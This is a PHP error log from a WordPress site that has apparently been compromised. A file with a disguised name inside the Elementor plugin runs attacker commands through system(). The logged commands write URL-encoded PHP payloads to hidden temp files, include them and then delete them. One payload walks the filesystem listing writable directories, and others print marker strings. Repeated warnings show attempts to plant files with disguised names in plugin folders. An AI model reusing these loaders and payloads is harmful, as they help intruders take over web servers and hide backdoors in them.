[13-Jun-2025 11:19:25 UTC] PHP Fatal error:  Namespace declaration statement has to be the very first statement or after any declare call in the script in /home/izorlnspatmm/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Extension/StagingExtension.php on line 12
[02-Jul-2025 18:50:19 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20%20%20%24total%20%3D%200%3B%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p%20.%20DIRECTORY_SEPARATOR%20.%20%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C/d%3E%5Cn%22%3B%20%20%20%20%20global%20%24total%3B%20%20%20%20%20%24total%2B%2B%3B%20%20%20%20%20if%20%28%24total%20%3E%3D%20300%29%20%7B%20%20%20%20%20%20%20%20%20die%28%27%21ended%21%27%29%3B%20%20%20%20%20%7D%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20global%20%24total%3B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24total%20%3E%3D%20300%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20closedir%28%24dir%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20closedir%28%24dir%29%3B%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%27/%27%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.reset&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/izorlnspatmm/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Extension/js_menu.php on line 32
[02-Jul-2025 19:14:05 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/showthumb): Failed to open stream: No such file or directory in /tmp/.dbx_convert on line 1
[02-Jul-2025 19:19:30 UTC] PHP Warning:  Undefined array key "file" in /tmp/.mb_convert on line 1
[02-Jul-2025 19:19:30 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.mb_convert on line 1
[02-Jul-2025 19:22:51 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/showthumb): Failed to open stream: No such file or directory in /tmp/.rfind on line 1
[02-Jul-2025 19:24:37 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/showthumb): Failed to open stream: No such file or directory in /tmp/.ibase_pconnection on line 1
[02-Jul-2025 19:25:28 UTC] PHP Warning:  Undefined array key "file" in /tmp/.locked on line 1
[02-Jul-2025 19:25:28 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.locked on line 1
[02-Jul-2025 19:26:03 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/showthumb): Failed to open stream: No such file or directory in /tmp/.request on line 1
[02-Jul-2025 20:01:58 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/class.image): Failed to open stream: No such file or directory in /tmp/.db2_convert on line 1
[02-Jul-2025 20:08:56 UTC] PHP Warning:  Undefined array key "file" in /tmp/.class on line 1
[02-Jul-2025 20:08:56 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.class on line 1
[02-Jul-2025 20:16:52 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/class.image): Failed to open stream: No such file or directory in /tmp/.partition on line 1
[02-Jul-2025 20:18:22 UTC] PHP Warning:  Undefined array key "file" in /tmp/.request on line 1
[02-Jul-2025 20:18:22 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.request on line 1
[02-Jul-2025 20:19:14 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/class.image): Failed to open stream: No such file or directory in /tmp/.content on line 1
[02-Jul-2025 22:05:28 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/flags_install): Failed to open stream: No such file or directory in /tmp/.internal on line 1
[02-Jul-2025 22:11:54 UTC] PHP Warning:  Undefined array key "file" in /tmp/.rindex on line 1
[02-Jul-2025 22:11:54 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.rindex on line 1
[02-Jul-2025 22:18:48 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/flags_install): Failed to open stream: No such file or directory in /tmp/.class on line 1
[02-Jul-2025 22:28:29 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/flags_install): Failed to open stream: No such file or directory in /tmp/.multi on line 1
[02-Jul-2025 22:34:55 UTC] PHP Warning:  Undefined array key "file" in /tmp/.internal on line 1
[02-Jul-2025 22:34:55 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.internal on line 1
[02-Jul-2025 22:38:07 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/lib_ajax_admin): Failed to open stream: No such file or directory in /tmp/.class on line 1
[02-Jul-2025 22:39:00 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/flags_install): Failed to open stream: No such file or directory in /tmp/.rjust on line 1
[02-Jul-2025 23:01:42 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/commonhtml): Failed to open stream: No such file or directory in /tmp/.config on line 1
[02-Jul-2025 23:14:39 UTC] PHP Parse error:  syntax error, unexpected double-quote mark, expecting number in /tmp/.include on line 4
[02-Jul-2025 23:17:03 UTC] PHP Warning:  Undefined array key "file" in /tmp/.classes on line 1
[02-Jul-2025 23:17:03 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.classes on line 1
[02-Jul-2025 23:23:41 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/commonhtml): Failed to open stream: No such file or directory in /tmp/.accept on line 1
[02-Jul-2025 23:30:23 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/commonhtml): Failed to open stream: No such file or directory in /tmp/.dba_insertion on line 1
[02-Jul-2025 23:36:24 UTC] PHP Warning:  Undefined array key "file" in /tmp/.cache on line 1
[02-Jul-2025 23:36:24 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.cache on line 1
[02-Jul-2025 23:44:01 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/commonhtml): Failed to open stream: No such file or directory in /tmp/.sys on line 1
[02-Jul-2025 23:45:12 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/bottomuserscols): Failed to open stream: No such file or directory in /tmp/.sys on line 1
[02-Jul-2025 23:51:33 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/portuguese): Failed to open stream: No such file or directory in /tmp/.parle_tokens on line 1
[02-Jul-2025 23:56:06 UTC] PHP Warning:  Undefined array key "file" in /tmp/.parle_tokens on line 1
[02-Jul-2025 23:56:06 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.parle_tokens on line 1
[02-Jul-2025 23:58:58 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/extfilter): Failed to open stream: No such file or directory in /tmp/.post on line 1
[03-Jul-2025 00:02:35 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/bottomuserscols): Failed to open stream: No such file or directory in /tmp/.content on line 1
[03-Jul-2025 00:06:20 UTC] PHP Warning:  Undefined array key "file" in /tmp/.requests on line 1
[03-Jul-2025 00:06:20 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.requests on line 1
[03-Jul-2025 00:13:55 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/portuguese): Failed to open stream: No such file or directory in /tmp/.cache on line 1
[03-Jul-2025 00:14:02 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/bottomuserscols): Failed to open stream: No such file or directory in /tmp/.rjust on line 1
[03-Jul-2025 00:16:32 UTC] PHP Warning:  Undefined array key "file" in /tmp/.db2_convert on line 1
[03-Jul-2025 00:16:32 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.db2_convert on line 1
[03-Jul-2025 00:20:50 UTC] PHP Warning:  Undefined array key "file" in /tmp/.sys on line 1
[03-Jul-2025 00:20:50 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.sys on line 1
[03-Jul-2025 00:25:00 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/portuguese): Failed to open stream: No such file or directory in /tmp/.reset on line 1
[03-Jul-2025 00:25:57 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/bottomuserscols): Failed to open stream: No such file or directory in /tmp/.classes on line 1
[03-Jul-2025 00:32:41 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/extfilter): Failed to open stream: No such file or directory in /tmp/.config on line 1
[03-Jul-2025 00:32:58 UTC] PHP Warning:  Undefined array key "file" in /tmp/.rfind on line 1
[03-Jul-2025 00:32:58 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.rfind on line 1
[03-Jul-2025 00:39:59 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20print%20%22nuVqNMcwDofceAbjpw%22.%22tXRagTFQtImZyCjZYlk%22%3Bexit%3B&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.config&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/izorlnspatmm/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Extension/js_menu.php on line 32
[03-Jul-2025 01:41:30 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20%20%20%24total%20%3D%200%3B%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p%20.%20DIRECTORY_SEPARATOR%20.%20%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C/d%3E%5Cn%22%3B%20%20%20%20%20global%20%24total%3B%20%20%20%20%20%24total%2B%2B%3B%20%20%20%20%20if%20%28%24total%20%3E%3D%20300%29%20%7B%20%20%20%20%20%20%20%20%20die%28%27%21ended%21%27%29%3B%20%20%20%20%20%7D%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20global%20%24total%3B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24total%20%3E%3D%20300%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20closedir%28%24dir%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20closedir%28%24dir%29%3B%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%27/%27%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.parle_tokens&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/izorlnspatmm/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Extension/js_menu.php on line 32
[03-Jul-2025 01:57:54 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/your_links): Failed to open stream: No such file or directory in /tmp/.dbx_convert on line 1
[03-Jul-2025 02:55:56 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20print%20%22IigRrtHrdFuIwIkB%22.%22OPUmWvgntFHG%22%3Bexit%3B&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.accept&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/izorlnspatmm/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Extension/js_menu.php on line 32
